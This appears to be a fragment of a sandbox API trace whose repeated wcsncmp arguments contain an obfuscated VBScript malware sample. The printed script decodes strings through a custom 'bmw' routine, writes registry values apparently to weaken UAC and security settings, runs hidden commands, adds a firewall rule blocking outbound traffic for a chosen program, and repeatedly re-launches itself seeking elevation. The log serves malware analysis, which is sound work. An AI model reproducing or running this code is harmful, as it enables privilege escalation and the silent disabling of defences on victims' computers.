bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0226.336] wcsncmp (_String1="NEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 65 [0226.336] wcsncmp (_String1="EXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.336] wcsncmp (_String1="XEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 75 [0226.336] wcsncmp (_String1="EYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 56 [0226.336] wcsncmp (_String1="YCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet 